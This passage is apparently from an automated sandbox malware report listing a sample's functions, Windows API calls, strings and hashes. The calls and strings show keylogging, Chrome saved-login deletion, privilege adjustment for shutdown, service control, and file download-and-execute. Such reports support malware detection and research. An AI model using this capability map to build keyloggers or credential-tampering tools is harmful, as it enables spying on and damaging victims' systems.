                                      • Instruction ID: a2e9a7fc3e7395ec889844ff797c9d2714b531cb95b86417141bb8451cbcf169
                                      • Opcode Fuzzy Hash: 7e53b55336133014ef757f42cdece6438e370a336639ccae7e1b34883113f87f
                                      • Instruction Fuzzy Hash: 8A316072C8032CAADB24E7A0EC48FEA7B7CEF04204F9405E6E555D3040EB35A694CFA5
                                      Function 02B0A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02B0A2D3
                                      • SetWindowsHookExA.USER32(0000000D,02B0A2A4,00000000), ref: 02B0A2E1
                                      • GetLastError.KERNEL32 ref: 02B0A2ED
                                        • Part of subcall function 02B1B4EF: GetLocalTime.KERNEL32(00000000), ref: 02B1B509
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02B0A33B
                                      • TranslateMessage.USER32(?), ref: 02B0A34A
                                      • DispatchMessageA.USER32(?), ref: 02B0A355
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 02B0A301
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: b3c857a768ec6e5293d143f111b81594fd54f2d5a2d14994cbcc7791561cda44
                                      • Instruction ID: 176ced3e72126e5aed8b1624578845f75f945e03b5c28014c3a0f1926bcc7283
                                      • Opcode Fuzzy Hash: b3c857a768ec6e5293d143f111b81594fd54f2d5a2d14994cbcc7791561cda44
                                      • Instruction Fuzzy Hash: BB112032A40700EBDB127B75DC4996B7BECEB85651B008DADF882C3080EB348510CBA2
                                      Function 02B0A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 02B0A416
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 02B0A422
                                      • GetKeyboardLayout.USER32(00000000), ref: 02B0A429
                                      • GetKeyState.USER32(00000010), ref: 02B0A433
                                      • GetKeyboardState.USER32(?), ref: 02B0A43E
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02B0A461
                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02B0A4C1
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02B0A4FA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                      • String ID:
                                      • API String ID: 1888522110-0
                                      • Opcode ID: 0eb7483e4bf8a49c68f1f2a5996316015fbae880423514d0bc8188410e1f6baf
                                      • Instruction ID: eb1659cd43af2d7b486d652f51bef1d741a698ea2933bb4e94cdb3d63014523e
                                      • Opcode Fuzzy Hash: 0eb7483e4bf8a49c68f1f2a5996316015fbae880423514d0bc8188410e1f6baf
                                      • Instruction Fuzzy Hash: 39318C72944708FBD711DB90DC85F9BBBECEB88744F000C6AB645C71A0E7B1A5588BA2
                                      Function 02B13FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02B1409D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02B140A9
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02B1426A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B14271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: 6d3738476cb6341f22229059f61db3c03e8d4d8e8afabc30c2fdbdfec2dd4cdc
                                      • Instruction ID: c89c0b487e61c9feadb215fcf30774208603b760141f950ae106fcb004124c39
                                      • Opcode Fuzzy Hash: 6d3738476cb6341f22229059f61db3c03e8d4d8e8afabc30c2fdbdfec2dd4cdc
                                      • Instruction Fuzzy Hash: F4B1EB72A043006BDA19F778DC9AC7E3FBA9F91740F8005DDF946571D0FE658908CA92
                                      Function 02B0BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02B0BA4E
                                      • GetLastError.KERNEL32 ref: 02B0BA58
                                      Strings
                                      • [Chrome StoredLogins found, cleared!], xrefs: 02B0BA7E
                                      • [Chrome StoredLogins not found], xrefs: 02B0BA72
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02B0BA19
                                      • UserProfile, xrefs: 02B0BA1E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: 3056906f51f59f252c938f3ad2f6887bdcfd5cc4ff26f17d675574ea9934ee41
                                      • Instruction ID: cc2fdfc962cca20cc3eb667c4e83cfbef6409790489b1a06fe940ad0cc45b945
                                      • Opcode Fuzzy Hash: 3056906f51f59f252c938f3ad2f6887bdcfd5cc4ff26f17d675574ea9934ee41
                                      • Instruction Fuzzy Hash: E4012631A802056B5B0E77BACCDBDFE3F2AAB11704B4002D9E813621E0FE0A4518CED2
                                      Function 02B17952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 02B1795F
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 02B17966
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02B17978
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02B17997
                                      • GetLastError.KERNEL32 ref: 02B1799D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 98ba7e6cef2ff08781ddaff2e0265ca42b3995842a94dd6d97bb358e4b97306a
                                      • Instruction ID: b6bb8f111cad8ee68f9cc7e2b4bf638190a3296a344a5c70eb539f626a5dc6dd
                                      • Opcode Fuzzy Hash: 98ba7e6cef2ff08781ddaff2e0265ca42b3995842a94dd6d97bb358e4b97306a
                                      • Instruction Fuzzy Hash: 1EF03A71841229EBEB10ABA0EC4DFEF7FBCEF05251F100855B909A6040D6384A14CAF1
                                      Function 02B54159 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: c79a5be75407ff89f725f541ea413d25ffc98e944f26b0d089c01803fce45107
                                      • Instruction ID: 2be535787f6f032333aed380f9d5a2756d2d823acea2ad167cfc7a625057a1a8
                                      • Opcode Fuzzy Hash: c79a5be75407ff89f725f541ea413d25ffc98e944f26b0d089c01803fce45107
                                      • Instruction Fuzzy Hash: 8EC23C71E046388FDB25CE28DD407EAB7B5EB84305F5541EAD84EEB240E779AE858F40
                                      Function 02B09253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B09258
                                        • Part of subcall function 02B048C8: connect.WS2_32(?,?,?), ref: 02B048E0
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B092F4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02B09352
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02B093AA
                                      • FindClose.KERNEL32(00000000), ref: 02B093C1
                                        • Part of subcall function 02B04E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E38
                                        • Part of subcall function 02B04E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E43
                                        • Part of subcall function 02B04E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,02B051C0,?,?,?,02B05159), ref: 02B04E4C
                                      • FindClose.KERNEL32(00000000), ref: 02B095B9
                                        • Part of subcall function 02B04AA1: WaitForSingleObject.KERNEL32(?,00000000,02B0547D,?,?,00000004,?,?,00000004,?,02B74EF8,?), ref: 02B04B47
                                        • Part of subcall function 02B04AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,02B74EF8,?,?,?,?,?,?,02B0547D), ref: 02B04B75
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                      • String ID:
                                      • API String ID: 1824512719-0
                                      • Opcode ID: cfb3363437b2e55a3df009b5fe91a7484959ad96dcc5b9fd13d820feedee0c19
                                      • Instruction ID: 6983c7f521f59651d61791aaf380e49d542ade88ac010795addb95815490f050
                                      • Opcode Fuzzy Hash: cfb3363437b2e55a3df009b5fe91a7484959ad96dcc5b9fd13d820feedee0c19
                                      • Instruction Fuzzy Hash: 7FB16E329005189BDB1AEBA4DDD5AEDBB7AAF04750F1041D9E50AA70E1EF309A48CF90
                                      Function 02B1AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02B1A6A0,00000000), ref: 02B1AA53
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02B1A6A0,00000000), ref: 02B1AA68
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02B1A6A0,00000000), ref: 02B1AA75
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02B1A6A0,00000000), ref: 02B1AA80
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02B1A6A0,00000000), ref: 02B1AA92
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02B1A6A0,00000000), ref: 02B1AA95
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: dfca90caa1a3d65b36c3c6d6c622bed846498ca868a5f7d9c59c08f18952cc98
                                      • Instruction ID: e42f88b1da8c77429d0c68916f10fdd50903c72c28ef73c29025bd8c18c448b8
                                      • Opcode Fuzzy Hash: dfca90caa1a3d65b36c3c6d6c622bed846498ca868a5f7d9c59c08f18952cc98
                                      • Instruction Fuzzy Hash: 12F0E271991734AFD212AB24ACC8EFF2B6CDF813E1B040C59F805870809B688C49E9F1
                                      Function 02B167B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B17952: GetCurrentProcess.KERNEL32(00000028,?), ref: 02B1795F
                                        • Part of subcall function 02B17952: OpenProcessToken.ADVAPI32(00000000), ref: 02B17966
                                        • Part of subcall function 02B17952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02B17978
                                        • Part of subcall function 02B17952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02B17997
                                        • Part of subcall function 02B17952: GetLastError.KERNEL32 ref: 02B1799D
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 02B16856
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02B1686B
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B16872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-1420736420
                                      • Opcode ID: 15b85ae688c05e6a597a8ca706a089bc76b2e757767391d7fa1d646f9de4f7a6
                                      • Instruction ID: 99a641c72b0e0afbfabec5448fb8adba3e1b6fb6f3efb93f39329a954f71b486
                                      • Opcode Fuzzy Hash: 15b85ae688c05e6a597a8ca706a089bc76b2e757767391d7fa1d646f9de4f7a6
                                      • Instruction Fuzzy Hash: 442162B1B143015BDF29FBB888D8A7E6B4F9F41784F8008E9A046975C1EF69D808CF61
                                      Function 02B5243C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 02B524D5
                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 02B524FE
                                      • GetACP.KERNEL32 ref: 02B52513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: 9fe58091d68b68c21c22f5674ef67f2acc3d9233171c488611a9d54fe8116c55
                                      • Instruction ID: aaccbfd6aabeb461459c3d26d0b9492a36d75d2996ca2491a2f623d16181f34c
                                      • Opcode Fuzzy Hash: 9fe58091d68b68c21c22f5674ef67f2acc3d9233171c488611a9d54fe8116c55
                                      • Instruction Fuzzy Hash: 2F21D732A02121E7EB35CF54D954BA773A6EF44B68B4E85E4EE09DF201E732DA40C790
                                      Function 02B1B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 02B1B4B9
                                      • LoadResource.KERNEL32(00000000,?,?,02B0F3DE,00000000), ref: 02B1B4CD
                                      • LockResource.KERNEL32(00000000,?,?,02B0F3DE,00000000), ref: 02B1B4D4
                                      • SizeofResource.KERNEL32(00000000,?,?,02B0F3DE,00000000), ref: 02B1B4E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: 4a1e6985e7c84fde470b9f5f9bd3536dcf0831b22b82c4e9d0f4cdb36944d22f
                                      • Instruction ID: 9d2365b8c18d7d20f31dc1db13ece9ed333457a333e28d2836d0fe836c44d2e0
                                      • Opcode Fuzzy Hash: 4a1e6985e7c84fde470b9f5f9bd3536dcf0831b22b82c4e9d0f4cdb36944d22f
                                      • Instruction Fuzzy Hash: 3DE01235A80730FBDB211B65AC4CE463F29F7C57D67040865FA01DB210CB754464DA90
                                      Function 02B09665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B0966A
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 02B096E2
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 02B0970B
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02B09722
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: 637bdc7a0e68e5415b481a9956ef27790886d9f5600670d8e67a4cac19775440
                                      • Instruction ID: f3f6a0315cd0c3eb0040f390981ed6872920038e14eca3a068e2f9e53cc78e31
                                      • Opcode Fuzzy Hash: 637bdc7a0e68e5415b481a9956ef27790886d9f5600670d8e67a4cac19775440
                                      • Instruction Fuzzy Hash: 468140329101189BDB1AEBA4DCD49EDBB7ABF14354F1045AAE50AA70D1FF30AB49CF50
                                      Function 02B52610 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B48274
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • GetUserDefaultLCID.KERNEL32 ref: 02B5271C
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02B52777
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 02B52786
                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 02B527CE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 02B527ED
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: 02302936f6f7c171cdeb5e4e4788ff38cd82e533d84a508f662a375fae6092e9
                                      • Instruction ID: 0d5e3a879acd78638e657abb9152e3e560846a208fd7f77d6e1d809c3a489322
                                      • Opcode Fuzzy Hash: 02302936f6f7c171cdeb5e4e4788ff38cd82e533d84a508f662a375fae6092e9
                                      • Instruction Fuzzy Hash: 23516071A02225ABEF11EFA5DC84BBA77B9EF18740F0444A5ED54EF190EB709D40CBA1
                                      Function 02B0880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02B08811
                                      • FindFirstFileW.KERNEL32(00000000,?,02B66608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088CA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B088F2
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088FF
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B08A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: b32c279ec52ca5176d7cf8c141ffc1b2ba8bf3ccbe7f9fbc6e631dde627880d5
                                      • Instruction ID: c66c7245cfe064e0c35d93e7bc5a0b6a55cbd6656832736b78921cfbd3d42332
                                      • Opcode Fuzzy Hash: b32c279ec52ca5176d7cf8c141ffc1b2ba8bf3ccbe7f9fbc6e631dde627880d5
                                      • Instruction Fuzzy Hash: B3513A72900208AADF0AFB64DD999ED7B7EAF10344F504199A81AA70D1FF349B48CF91
                                      Function 02B06EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02B06FBC
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02B070A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$open
                                      • API String ID: 2825088817-4147394040
                                      • Opcode ID: 9ff4af691581f039775a4be226e2ed568ffc89cb4b6287794f7131574f4de946
                                      • Instruction ID: 2292cb74f396b28dcdffd3890d8121050dbb7ead3a82a11a0f3649fdf97e5198
                                      • Opcode Fuzzy Hash: 9ff4af691581f039775a4be226e2ed568ffc89cb4b6287794f7131574f4de946
                                      • Instruction Fuzzy Hash: D061B371B043005BDA2AFB78C8D997EBFAB9F80750F4009DCA446571C5EE649949CB92
                                      Function 02B1C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02B1CAD7
                                        • Part of subcall function 02B1376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02B1377E
                                        • Part of subcall function 02B1376F: RegSetValueExA.KERNEL32(?,02B674B8,00000000,?,00000000,00000000,02B752F0,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137A6
                                        • Part of subcall function 02B1376F: RegCloseKey.KERNEL32(?,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: 1b774067dd8bbe00ebfadee97658afe6dc1811683b9f87907738fc8482a4fad1
                                      • Instruction ID: 5f1c905f27e74aa9c78164a8105d61c5d586a045d9bb5f67ffdcfa0bbb55cf2c
                                      • Opcode Fuzzy Hash: 1b774067dd8bbe00ebfadee97658afe6dc1811683b9f87907738fc8482a4fad1
                                      • Instruction Fuzzy Hash: 10116362FC020473F819713D0D6FF7E2E069742A50FC801DBF9532A6DAE88B0A9446D7
                                      Function 02B51CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02B51DBA
                                      • _wcschr.LIBVCRUNTIME ref: 02B51E4A
                                      • _wcschr.LIBVCRUNTIME ref: 02B51E58
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 02B51EFB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      • Opcode ID: e36a811e73021d15cd38af9e1ae93f993c77bb7e7ca84c7f63d17851802e00bb
                                      • Instruction ID: eef427e59a6d9eca2828b092bd2a52228497aa0098cbe560722ef77cf7aa45b2
                                      • Opcode Fuzzy Hash: e36a811e73021d15cd38af9e1ae93f993c77bb7e7ca84c7f63d17851802e00bb
                                      • Instruction Fuzzy Hash: A961E735620726AADB25AB38CC81BB673A9EF05314F1404E9ED4DDF580EBB0E940CB60
                                      Function 02B493AD Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 02B493BD
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • GetTimeZoneInformation.KERNEL32 ref: 02B493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02B72764,000000FF,?,0000003F,?,?), ref: 02B49447
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02B727B8,000000FF,?,0000003F,?,?,?,02B72764,000000FF,?,0000003F,?,?), ref: 02B49474
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                      • String ID:
                                      • API String ID: 806657224-0
                                      • Opcode ID: 5244d1f51e69b43eb85801d2e14c7fd199e81db526b4e9ac19dd2ea385f10c53
                                      • Instruction ID: adfc7e4962813da64ce0b8a2577cda8947695b58f3a386c8b5b311f585e58c16
                                      • Opcode Fuzzy Hash: 5244d1f51e69b43eb85801d2e14c7fd199e81db526b4e9ac19dd2ea385f10c53
